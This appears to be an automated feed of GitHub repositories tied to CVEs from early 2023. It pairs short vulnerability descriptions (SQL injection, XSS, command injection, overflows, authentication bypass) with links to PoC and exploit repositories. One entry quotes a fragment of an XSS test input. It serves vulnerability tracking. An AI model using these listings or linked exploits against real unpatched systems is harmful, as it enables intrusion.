**This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PDF files. The issue re CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42403](https://github.com/Live-Hack-CVE/CVE-2022-42403) create time: 2023-01-27T21:40:43Z

**Proof Of Concept for CVE-2022-47873 KEOS Software** : [waspthebughunter/CVE-2022-47873](https://github.com/waspthebughunter/CVE-2022-47873) create time: 2023-01-27T21:03:37Z

**Stack-based Buffer Overflow vulnerability in libUPnPHndlr.so in Belkin Wemo Insight Smart Plug allows remote attackers to bypass local security protection via a crafted HTTP post packet. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-6692](https://github.com/Live-Hack-CVE/CVE-2018-6692) create time: 2023-01-27T19:29:26Z

**Directory Traversal vulnerability in the administrative user interface in McAfee Web Gateway (MWG) MWG 7.8.1.x allows authenticated administrator users to gain elevated privileges via unspecified vectors. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-6677](https://github.com/Live-Hack-CVE/CVE-2018-6677) create time: 2023-01-27T19:29:22Z

**CA API Developer Portal 4.x, prior to v4.2.5.3 and v4.2.7.1, has an unspecified reflected cross-site scripting vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-6590](https://github.com/Live-Hack-CVE/CVE-2018-6590) create time: 2023-01-27T19:29:19Z

**Authentication Bypass vulnerability in TPM autoboot in McAfee Drive Encryption (MDE) 7.1.0 and above allows physically proximate attackers to bypass local security protection via specific set of circumstances. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-6686](https://github.com/Live-Hack-CVE/CVE-2018-6686) create time: 2023-01-27T19:29:15Z

**An unprivileged user can delete arbitrary files on a Linux system running ENSLTP 10.5.1, 10.5.0, and 10.2.3 Hotfix 1246778 and earlier. By exploiting a time of check to time of use (TOCTOU) race condition during a specific scanning sequence, the unprivileged user is able to perform a privilege escalation to delete arbi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-6693](https://github.com/Live-Hack-CVE/CVE-2018-6693) create time: 2023-01-27T19:28:52Z

**Accessing, modifying, or executing executable files vulnerability in Microsoft Windows client in McAfee Application and Change Control (MACC) 8.0.0 Hotfix 4 and earlier allows authenticated users to execute arbitrary code via file transfer from external system. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-6690](https://github.com/Live-Hack-CVE/CVE-2018-6690) create time: 2023-01-27T19:28:19Z

**Authentication Bypass vulnerability in McAfee Data Loss Prevention Endpoint (DLPe) 10.0.x earlier than 10.0.510, and 11.0.x earlier than 11.0.600 allows attackers to bypass local security protection via specific conditions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-6689](https://github.com/Live-Hack-CVE/CVE-2018-6689) create time: 2023-01-27T19:28:12Z

**DLL Search Order Hijacking vulnerability in Microsoft Windows Client in McAfee True Key (TK) before 5.1.165 allows local users to execute arbitrary code via specially crafted malware. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-6700](https://github.com/Live-Hack-CVE/CVE-2018-6700) create time: 2023-01-27T19:28:08Z

**Use After Free in Remote logging (which is disabled by default) in McAfee McAfee Agent (MA) 5.x prior to 5.6.0 allows remote unauthenticated attackers to cause a Denial of Service and potentially a remote code execution via a specially crafted HTTP header sent to the logging service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-6703](https://github.com/Live-Hack-CVE/CVE-2018-6703) create time: 2023-01-27T19:28:05Z

**An out-of-bounds write vulnerability was found in glibc before 2.31 when handling signal trampolines on PowerPC. Specifically, the backtrace function did not properly check the array bounds when storing the frame address, resulting in a denial of service or potential code execution. The highest threat from this vulnera CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-1751](https://github.com/Live-Hack-CVE/CVE-2020-1751) create time: 2023-01-27T19:29:30Z

**re2c 1.3 has a heap-based buffer overflow in Scanner::fill in parse/scanner.cc via a long lexeme. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-11958](https://github.com/Live-Hack-CVE/CVE-2020-11958) create time: 2023-01-27T19:29:12Z

**A use after free vulnerability in ip_reass() in ip_input.c of libslirp 4.2.0 and prior releases allows crafted packets to cause a denial of service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-1983](https://github.com/Live-Hack-CVE/CVE-2020-1983) create time: 2023-01-27T19:29:08Z

**setMarkdown in Qt before 5.14.2 has a use-after-free related to QTextMarkdownImporter::insertBlock. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-12267](https://github.com/Live-Hack-CVE/CVE-2020-12267) create time: 2023-01-27T19:29:04Z

**exif_entry_get_value in exif-entry.c in libexif 0.6.21 has a divide-by-zero error. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-12767](https://github.com/Live-Hack-CVE/CVE-2020-12767) create time: 2023-01-27T19:29:00Z

**OpenConnect 8.09 has a buffer overflow, causing a denial of service (application crash) or possibly unspecified other impact, via crafted certificate data to get_cert_name in gnutls.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-12823](https://github.com/Live-Hack-CVE/CVE-2020-12823) create time: 2023-01-27T19:28:56Z

**An issue was discovered in libexif before 0.6.22. Several buffer over-reads in EXIF MakerNote handling could lead to information disclosure and crashes. This is different from CVE-2020-0093. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-13112](https://github.com/Live-Hack-CVE/CVE-2020-13112) create time: 2023-01-27T19:28:49Z

**In FreeRDP less than or equal to 2.0.0, by providing manipulated input a malicious client can create a double free condition and crash the server. This is fixed in version 2.1.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-11017](https://github.com/Live-Hack-CVE/CVE-2020-11017) create time: 2023-01-27T19:28:45Z

**In FreeRDP less than or equal to 2.0.0, a possible resource exhaustion vulnerability can be performed. Malicious clients could trigger out of bound reads causing memory allocation with random size. This has been fixed in 2.1.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-11018](https://github.com/Live-Hack-CVE/CVE-2020-11018) create time: 2023-01-27T19:28:41Z

**In FreeRDP less than or equal to 2.0.0, when running with logger set to "WLOG_TRACE", a possible crash of application could occur due to a read of an invalid array index. Data could be printed as string to local terminal. This has been fixed in 2.1.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-11019](https://github.com/Live-Hack-CVE/CVE-2020-11019) create time: 2023-01-27T19:28:38Z

**ZNC 1.8.0 up to 1.8.1-rc1 allows authenticated users to trigger an application crash (with a NULL pointer dereference) if echo-message is not enabled and there is no network. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-13775](https://github.com/Live-Hack-CVE/CVE-2020-13775) create time: 2023-01-27T19:28:34Z

**The ClearPass Policy Manager web interface is affected by a vulnerability that leads to authentication bypass. Upon successful bypass an attacker could then execute an exploit that would allow to remote command execution in the underlying operating system. Resolution: Fixed in 6.7.13-HF, 6.8.5-HF, 6.8.6, 6.9.1 and high CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-7115](https://github.com/Live-Hack-CVE/CVE-2020-7115) create time: 2023-01-27T19:28:30Z

**A flaw was found in QEMU in the implementation of the Pointer Authentication (PAuth) support for ARM introduced in version 4.0 and fixed in version 5.0.0. A general failure of the signature generation process caused every PAuth-enforced pointer to be signed with the same signature. A local attacker could obtain the sig CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10702](https://github.com/Live-Hack-CVE/CVE-2020-10702) create time: 2023-01-27T19:28:27Z

**In affected versions of WordPress, users with low privileges (like contributors and authors) can use the embed block in a certain way to inject unfiltered HTML in the block editor. When affected posts are viewed by a higher privileged user, this could lead to script execution in the editor/wp-admin. This has been patch CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-4046](https://github.com/Live-Hack-CVE/CVE-2020-4046) create time: 2023-01-27T19:28:23Z

**ScaleViewPortExtEx in libemf.cpp in libEMF (aka ECMA-234 Metafile Library) 1.0.12 allows an integer overflow and denial of service via a crafted EMF file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-13999](https://github.com/Live-Hack-CVE/CVE-2020-13999) create time: 2023-01-27T19:28:15Z

**The Server-Server protocol implementation in ngIRCd before 26~rc2 allows an out-of-bounds access, as demonstrated by the IRC_NJOIN() function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-14148](https://github.com/Live-Hack-CVE/CVE-2020-14148) create time: 2023-01-27T19:28:01Z

**LPE PoC of a user-after-free vulnerability in the Linux netfilter subsystem.** : [ysanatomic/CVE-2022-32250-LPE](https://github.com/ysanatomic/CVE-2022-32250-LPE) create time: 2023-01-27T14:44:39Z

**The Sophos Secure Email application through 3.9.4 for Android has Missing SSL Certificate Validation. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-14980](https://github.com/Live-Hack-CVE/CVE-2020-14980) create time: 2023-01-27T17:15:38Z

**Zyxel Armor X1 WAP6806 1.00(ABAL.6)C0 devices allow Directory Traversal via the images/eaZy/ URI. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-14461](https://github.com/Live-Hack-CVE/CVE-2020-14461) create time: 2023-01-27T17:15:33Z

**The ThreatTrack VIPRE Password Vault app through 1.100.1090 for iOS has Missing SSL Certificate Validation. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-14981](https://github.com/Live-Hack-CVE/CVE-2020-14981) create time: 2023-01-27T17:15:30Z

**The server in Chocolate Doom 3.0.0 and Crispy Doom 5.8.0 doesn't validate the user-controlled num_players value, leading to a buffer overflow. A malicious user can overwrite the server's stack. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-14983](https://github.com/Live-Hack-CVE/CVE-2020-14983) create time: 2023-01-27T17:14:55Z

**The Firstname and Lastname parameters in Global RADAR BSA Radar 1.6.7234.24750 and earlier are vulnerable to stored cross-site scripting (XSS) via Update User Profile. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-14943](https://github.com/Live-Hack-CVE/CVE-2020-14943) create time: 2023-01-27T17:14:46Z

**VMware ESXi (7.0 before ESXi_7.0.0-1.20.16321839, 6.7 before ESXi670-202006401-SG and 6.5 before ESXi650-202005401-SG), Workstation (15.x before 15.5.2), and Fusion (11.x before 11.5.2) contain a use-after-free vulnerability in PVNVRAM. A malicious actor with local access to a virtual machine may be able to read privil CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-3963](https://github.com/Live-Hack-CVE/CVE-2020-3963) create time: 2023-01-27T17:14:42Z

**In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, a Cross-Site Scripting (XSS) vulnerability exists in an undisclosed page of the BIG-IP Configuration utility. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-5903](https://github.com/Live-Hack-CVE/CVE-2020-5903) create time: 2023-01-27T17:14:38Z

**In versions 13.1.0-13.1.3.3, 12.1.0-12.1.5.2, and 11.6.1-11.6.5.2, the BIG-IP system does not properly enforce the access controls for the scp.blacklist files. This allows Admin and Resource Admin users with Secure Copy (SCP) protocol access to read and overwrite blacklisted files via SCP. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-5906](https://github.com/Live-Hack-CVE/CVE-2020-5906) create time: 2023-01-27T17:14:34Z

**In PrestaShop from version 1.5.3.0 and before version 1.7.6.6, there is a stored XSS when using the name of a quick access item. The problem is fixed in 1.7.6.6. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-11074](https://github.com/Live-Hack-CVE/CVE-2020-11074) create time: 2023-01-27T17:14:30Z

**In PrestaShop from version 1.5.0.0 and before version 1.7.6.6, the authentication system is malformed and an attacker is able to forge requests and execute admin commands. The problem is fixed in 1.7.6.6. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-4074](https://github.com/Live-Hack-CVE/CVE-2020-4074) create time: 2023-01-27T17:14:26Z

**When constructing a permission prompt for WebRTC, a URI was supplied from the content process. This URI was untrusted, and could have been the URI of an origin that was previously granted permission; bypassing the prompt. This vulnerability affects Firefox < 78. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-12424](https://github.com/Live-Hack-CVE/CVE-2020-12424) create time: 2023-01-27T17:14:23Z

**Mozilla Developer Iain Ireland discovered a missing type check during unboxed objects removal, resulting in a crash. We presume that with enough effort that it could be exploited to run arbitrary code. This vulnerability affects Thunderbird < 68.9.0, Firefox < 77, and Firefox ESR < 68.9. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-12406](https://github.com/Live-Hack-CVE/CVE-2020-12406) create time: 2023-01-27T17:14:19Z

**When "%2F" was present in a manifest URL, Firefox's AppCache behavior may have become confused and allowed a manifest to be served from a subdirectory. This could cause the appcache to be used to service requests for the top level directory. This vulnerability affects Firefox < 78. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-12415](https://github.com/Live-Hack-CVE/CVE-2020-12415) create time: 2023-01-27T17:14:15Z

**Manipulating individual parts of a URL object could have caused an out-of-bounds read, leaking process memory to malicious JavaScript. This vulnerability affects Firefox ESR < 68.10, Firefox < 78, and Thunderbird < 68.10.0. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-12418](https://github.com/Live-Hack-CVE/CVE-2020-12418) create time: 2023-01-27T17:14:12Z

**Magneto LTS (Long Term Support) is a community developed alternative to the Magento CE official releases. Versions prior to 19.4.22 and 20.0.19 are vulnerable to Cross-Site Request Forgery. The password reset form is vulnerable to CSRF between the time the reset password link is clicked and user submits new password. T CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-21395](https://github.com/Live-Hack-CVE/CVE-2021-21395) create time: 2023-01-27T17:14:51Z

**Phicomm K2 v22.6.534.263 was discovered to store the root and admin passwords in plaintext. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-48073](https://github.com/Live-Hack-CVE/CVE-2022-48073) create time: 2023-01-27T17:15:26Z

**Phicomm K2G v22.6.3.20 was discovered to contain a command injection vulnerability via the autoUpTime parameter in the automatic upgrade function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-48072](https://github.com/Live-Hack-CVE/CVE-2022-48072) create time: 2023-01-27T17:15:22Z

**Phicomm K2 v22.6.534.263 was discovered to store the root and admin passwords in plaintext. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-48071](https://github.com/Live-Hack-CVE/CVE-2022-48071) create time: 2023-01-27T17:15:19Z

**Phicomm K2 v22.6.534.263 was discovered to contain a command injection vulnerability via the autoUpTime parameter in the automatic upgrade function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-48070](https://github.com/Live-Hack-CVE/CVE-2022-48070) create time: 2023-01-27T17:15:15Z

**Totolink A830R V4.1.2cu.5182 was discovered to contain a command injection vulnerability via the QUERY_STRING parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-48069](https://github.com/Live-Hack-CVE/CVE-2022-48069) create time: 2023-01-27T17:15:11Z

**An information disclosure vulnerability in Totolink A830R V4.1.2cu.5182 allows attackers to obtain the root password via a brute-force attack. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-48067](https://github.com/Live-Hack-CVE/CVE-2022-48067) create time: 2023-01-27T17:15:07Z

**An issue in the component global.so of Totolink A830R V4.1.2cu.5182 allows attackers to bypass authentication via a crafted cookie. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-48066](https://github.com/Live-Hack-CVE/CVE-2022-48066) create time: 2023-01-27T17:15:03Z

**Razer Synapse before 3.7.0830.081906 allows privilege escalation due to an unsafe installation path, improper privilege management, and improper certificate validation. Attackers can place malicious DLLs into %PROGRAMDATA%\Razer\Synapse3\Service\bin if they do so before the service is installed and if they deny write a CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47632](https://github.com/Live-Hack-CVE/CVE-2022-47632) create time: 2023-01-27T17:14:59Z

**A null pointer dereference issue was discovered in function window_pane_set_event in window.c in tmux 3.0 thru 3.3 and later, allows attackers to cause denial of service or other unspecified impacts. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47016](https://github.com/Live-Hack-CVE/CVE-2022-47016) create time: 2023-01-27T16:09:20Z

**A null pointer dereference issue was discovered in functions op_get_data and op_open1 in opusfile.c in xiph opusfile 0.9 thru 0.12 allows attackers to cause denial of service or other unspecified impacts. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47021](https://github.com/Live-Hack-CVE/CVE-2022-47021) create time: 2023-01-27T16:09:14Z

**A null pointer dereference issue was discovered in function gui_x11_create_blank_mouse in gui_x11.c in vim 8.1.2269 thru 9.0.0339 allows attackers to cause denial of service or other unspecified impacts. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47024](https://github.com/Live-Hack-CVE/CVE-2022-47024) create time: 2023-01-27T16:09:10Z

**An issue was discovered in NetScout nGeniusONE 6.3.2 build 904. Open Redirection can occur (issue 2 of 2). After successful login, an attacker must visit the vulnerable parameter and inject a crafted payload to successfully redirect to an unknown host. The attack vector is Network, and the Attack Complexity required is CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44718](https://github.com/Live-Hack-CVE/CVE-2022-44718) create time: 2023-01-27T16:09:06Z

**An issue was discovered in NetScout nGeniusONE 6.3.2 build 904. Open Redirection can occur (issue 1 of 2). After successful login, an attacker must visit the vulnerable parameter and inject a crafted payload to successfully redirect to an unknown host. The attack vector is Network, and the Attack Complexity required is CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44717](https://github.com/Live-Hack-CVE/CVE-2022-44717) create time: 2023-01-27T16:09:02Z

**Improper File Permissions in NetScout nGeniusONE 6.3.2 build 904 allows authenticated remote users to gain permissions via a crafted payload. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44715](https://github.com/Live-Hack-CVE/CVE-2022-44715) create time: 2023-01-27T16:08:58Z

**SiteServer CMS 7.1.3 is vulnerable to SQL Injection. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44298](https://github.com/Live-Hack-CVE/CVE-2022-44298) create time: 2023-01-27T16:08:54Z

**An issue was discovered in NetScout nGeniusONE 6.3.2 before P10. It allows Reflected Cross-Site Scripting (XSS), issue 6 of 6. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44029](https://github.com/Live-Hack-CVE/CVE-2022-44029) create time: 2023-01-27T16:08:51Z

**An issue was discovered in NetScout nGeniusONE 6.3.2 before P10. It allows Reflected Cross-Site Scripting (XSS), issue 5 of 6. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44028](https://github.com/Live-Hack-CVE/CVE-2022-44028) create time: 2023-01-27T16:08:46Z

**An issue was discovered in NetScout nGeniusONE 6.3.2 before P10. It allows Reflected Cross-Site Scripting (XSS), issue 4 of 6. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44027](https://github.com/Live-Hack-CVE/CVE-2022-44027) create time: 2023-01-27T16:08:42Z

**An issue was discovered in NetScout nGeniusONE 6.3.2 before P10. It allows Reflected Cross-Site Scripting (XSS), issue 3 of 6. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44026](https://github.com/Live-Hack-CVE/CVE-2022-44026) create time: 2023-01-27T16:08:39Z

**An issue was discovered in NetScout nGeniusONE 6.3.2 before P10. It allows Reflected Cross-Site Scripting (XSS), issue 2 of 6. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44025](https://github.com/Live-Hack-CVE/CVE-2022-44025) create time: 2023-01-27T16:08:35Z

**An issue was discovered in NetScout nGeniusONE 6.3.2 before P10. It allows Reflected Cross-Site Scripting (XSS), issue 1 of 6. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44024](https://github.com/Live-Hack-CVE/CVE-2022-44024) create time: 2023-01-27T16:08:31Z

**The Login with Phone Number WordPress Plugin, version < 1.4.2, is affected by an authenticated SQL injection vulnerability in the 'ID' parameter of its 'lwp_forgot_password' action. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23492](https://github.com/Live-Hack-CVE/CVE-2023-23492) create time: 2023-01-27T16:08:25Z

**SQL Injection vulnerability in kishan0725 Hospital Management System thru commit 4770d740f2512693ef8fd9aa10a8d17f79fad9bd (on March 13, 2021), allows attackers to execute arbitrary commands via the contact and doctor parameters to /search.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-48120](https://github.com/Live-Hack-CVE/CVE-2022-48120) create time: 2023-01-27T13:56:32Z

**SQL Injection vulnerability in RemoteClinic 2.0 allows attackers to execute arbitrary commands and gain sensitive information via the id parameter to /medicines/profile.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-48152](https://github.com/Live-Hack-CVE/CVE-2022-48152) create time: 2023-01-27T13:56:28Z

**kraken <= 0.1.4 has an arbitrary file read vulnerability via the component testfs. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47747](https://github.com/Live-Hack-CVE/CVE-2022-47747) create time: 2023-01-27T13:56:25Z

**A vulnerability, which was classified as critical, was found in SourceCodester Online Tours & Travels Management System 1.0. This affects an unknown part of the file admin/expense_report.php. The manipulation of the argument to_date leads to sql injection. It is possible to initiate the attack remotely. The exploit has CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0534](https://github.com/Live-Hack-CVE/CVE-2023-0534) create time: 2023-01-27T13:57:01Z

**A vulnerability, which was classified as critical, has been found in SourceCodester Online Tours & Travels Management System 1.0. Affected by this issue is some unknown functionality of the file admin/expense_report.php. The manipulation of the argument from_date leads to sql injection. The attack may be launched remot CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0533](https://github.com/Live-Hack-CVE/CVE-2023-0533) create time: 2023-01-27T13:56:58Z

**A vulnerability classified as critical was found in SourceCodester Online Tours & Travels Management System 1.0. Affected by this vulnerability is an unknown functionality of the file admin/disapprove_user.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0532](https://github.com/Live-Hack-CVE/CVE-2023-0532) create time: 2023-01-27T13:56:54Z

**A vulnerability classified as critical has been found in SourceCodester Online Tours & Travels Management System 1.0. Affected is an unknown function of the file admin/booking_report.php. The manipulation of the argument to_date leads to sql injection. It is possible to launch the attack remotely. The exploit has been CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0531](https://github.com/Live-Hack-CVE/CVE-2023-0531) create time: 2023-01-27T13:56:50Z

**A vulnerability was found in SourceCodester Online Tours & Travels Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file admin/approve_user.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been d CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0530](https://github.com/Live-Hack-CVE/CVE-2023-0530) create time: 2023-01-27T13:56:46Z

**A vulnerability was found in SourceCodester Online Tours & Travels Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file admin/add_payment.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been di CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0529](https://github.com/Live-Hack-CVE/CVE-2023-0529) create time: 2023-01-27T13:56:43Z

**A vulnerability was found in SourceCodester Online Tours & Travels Management System 1.0. It has been classified as critical. This affects an unknown part of the file admin/abc.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0528](https://github.com/Live-Hack-CVE/CVE-2023-0528) create time: 2023-01-27T13:56:39Z

**A vulnerability was found in PHPGurukul Online Security Guards Hiring System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file search-request.php. The manipulation of the argument searchdata with the input ">alert(document.domain) leads to cross site sc CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0527](https://github.com/Live-Hack-CVE/CVE-2023-0527) create time: 2023-01-27T13:56:36Z

**Razer Synapse before 3.7.0228.022817 allows privilege escalation because it relies on %PROGRAMDATA%\Razer\Synapse3\Service\bin even if %PROGRAMDATA%\Razer has been created by any unprivileged user before Synapse is installed. The unprivileged user may have placed Trojan horse DLLs there. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-44226](https://github.com/Live-Hack-CVE/CVE-2021-44226) create time: 2023-01-27T11:46:17Z

**In Eclipse GlassFish versions 5.1.0 to 6.2.5, there is a vulnerability in relative path traversal because it does not filter request path starting with './'. Successful exploitation could allow an remote unauthenticated attacker to access critical data, such as configuration files and deployed application source code. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2712](https://github.com/Live-Hack-CVE/CVE-2022-2712) create time: 2023-01-27T11:46:12Z

**In Apache::Session::Browseable before 1.3.6, validity of the X.509 certificate is not checked by default when connecting to remote LDAP backends, because the default configuration of the Net::LDAPS module for Perl is used. NOTE: this can, for example, be fixed in conjunction with the CVE-2020-16093 fix. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36659](https://github.com/Live-Hack-CVE/CVE-2020-36659) create time: 2023-01-27T06:20:56Z

**In Apache::Session::LDAP before 0.5, validity of the X.509 certificate is not checked by default when connecting to remote LDAP backends, because the default configuration of the Net::LDAPS module for Perl is used. NOTE: this can, for example, be fixed in conjunction with the CVE-2020-16093 fix. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-36658](https://github.com/Live-Hack-CVE/CVE-2020-36658) create time: 2023-01-27T06:20:52Z

**Discourse is an open source platform for community discussion. Versions prior to 3.1.0.beta1 (beta) (tests-passed) are vulnerable to Allocation of Resources Without Limits. Users can create chat drafts of an unlimited length, which can cause a denial of service by generating an excessive load on the server. Additionall CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22740](https://github.com/Live-Hack-CVE/CVE-2023-22740) create time: 2023-01-27T06:21:03Z

**Haven 5d15944 allows Server-Side Request Forgery (SSRF) via the feed[url]= Feeds functionality. Authenticated users with the ability to create new RSS Feeds or add RSS Feeds can supply an arbitrary hostname (or even the hostname of the Haven server itself). NOTE: this product has significant usage but does not have num CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24060](https://github.com/Live-Hack-CVE/CVE-2023-24060) create time: 2023-01-27T06:20:59Z

**An access control issue in Revenue Collection System v1.0 allows unauthenticated attackers to view the contents of /admin/DBbackup/ directory. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46967](https://github.com/Live-Hack-CVE/CVE-2022-46967) create time: 2023-01-27T01:46:57Z

**Revenue Collection System v1.0 was discovered to contain a SQL injection vulnerability at step1.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46966](https://github.com/Live-Hack-CVE/CVE-2022-46966) create time: 2023-01-27T01:46:53Z

**Cross-site Scripting (XSS) - Stored in GitHub repository modoboa/modoboa prior to 2.0.4. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0519](https://github.com/Live-Hack-CVE/CVE-2023-0519) create time: 2023-01-27T01:47:04Z

**Improper Neutralization of Equivalent Special Elements in GitHub repository btcpayserver/btcpayserver prior to 1.7.5. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0493](https://github.com/Live-Hack-CVE/CVE-2023-0493) create time: 2023-01-27T01:47:00Z

**Several stack-based buffer overflow vulnerabilities exist in the DetranCLI command parsing functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network packet can lead to arbitrary command execution. An attacker can send a sequence of requests to trigger these vulnerabilities.This buffer ove CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40997](https://github.com/Live-Hack-CVE/CVE-2022-40997) create time: 2023-01-26T23:33:48Z

**Several stack-based buffer overflow vulnerabilities exist in the DetranCLI command parsing functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network packet can lead to arbitrary command execution. An attacker can send a sequence of requests to trigger these vulnerabilities.This buffer ove CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40996](https://github.com/Live-Hack-CVE/CVE-2022-40996) create time: 2023-01-26T23:33:43Z

**Several stack-based buffer overflow vulnerabilities exist in the DetranCLI command parsing functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network packet can lead to arbitrary command execution. An attacker can send a sequence of requests to trigger these vulnerabilities.This buffer ove CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40995](https://github.com/Live-Hack-CVE/CVE-2022-40995) create time: 2023-01-26T23:33:39Z

**Several stack-based buffer overflow vulnerabilities exist in the DetranCLI command parsing functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network packet can lead to arbitrary command execution. An attacker can send a sequence of requests to trigger these vulnerabilities.This buffer ove CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40994](https://github.com/Live-Hack-CVE/CVE-2022-40994) create time: 2023-01-26T23:33:34Z

**Several stack-based buffer overflow vulnerabilities exist in the DetranCLI command parsing functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted network packet can lead to arbitrary command execution. An attacker can send a sequence of requests to trigger these vulnerabilities.This buffer ove CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40992](https://github.com/Live-Hack-CVE/CVE-2022-40992) create time: 2023-01-26T23:33:30Z

